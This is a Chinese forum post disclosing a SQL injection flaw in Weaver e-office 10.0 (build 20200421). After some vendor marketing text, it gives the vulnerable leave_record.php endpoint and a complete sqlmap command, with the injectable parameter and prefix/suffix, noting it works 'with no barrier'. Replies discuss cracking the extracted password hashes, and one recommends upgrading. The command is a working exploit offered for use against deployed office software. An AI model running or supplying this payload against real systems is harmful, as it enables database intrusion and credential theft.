泛微eoffice10-20200421注入漏洞

90_

泛微品牌影响力：

20年 专注OA的研发创新
OA软件领域 首家 主板上市公司
协同行业 “国家 重点 软件企业”
全国 200多个 本地化服务机构
中国高端移动办公协同OA的专业厂商


  泛微e-office深谙改革之道以迎变革之机，沉心产品研发数十载之久，全新产品e-office10.0正式上线，力求为用户提供更极致、更优质的产品体验。
  e-office10.0无论是在安全性、扩展性还是智能性方面，都进行了一次完美蜕变。在原版本基础上，V10.0主要具有10项优势。
  全新上线的e-office10.0在产品性能上做了进一步提升，无论是在安全性、扩展性还是智能性方面，都进行了一次完美蜕变。

漏洞存在的版本：
V10.0-20200421


注入点位置：

[PHP] 查看源码 复制代码

python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id

PS：table_field=*也可以

放进sqlmap直接跑就可以，无门槛~
缺陷是跑出来的密文无法解密，蛋疼的很

热心网友5

感谢分享这个漏洞信息！注入点分析得很清楚，sqlmap直接跑确实方便。 不过最后提到的密文无法解密确实比较遗憾，是不是因为e-office 10.0的密码加密方式比较特殊（比如加盐或者自定义算法）？如果有解密思路或者能拿到密钥的话，这个洞的价值就更高了。 另外，想问一下这个漏洞是否影响更新版本（比如20200421之后的补丁）？还是说只局限于这个特定时间点？期待进一步测试结果。

热心网友3

这个漏洞挺实用的，注入点给得很清晰，跑起来门槛确实很低。不过密文没法解密确实尴尬，可能是加密算法比较强？建议可以试试从其他字段找突破口，或者看看有没有 bypass 解密的方法。另外如果还在用这个版本的话，建议尽快升级，毕竟泛微官方应该已经出补丁了。

热心网友5

感谢分享这个漏洞信息。泛微e-office10.0的注入点看起来很明确，sqlmap跑起来也确实方便。关于密文无法解密的问题，可能得看具体数据库类型和加密算法，不过至少能利用注入获取数据了。如果官方有补丁或临时缓解措施，也方便大家及时防护。再次感谢你的提醒。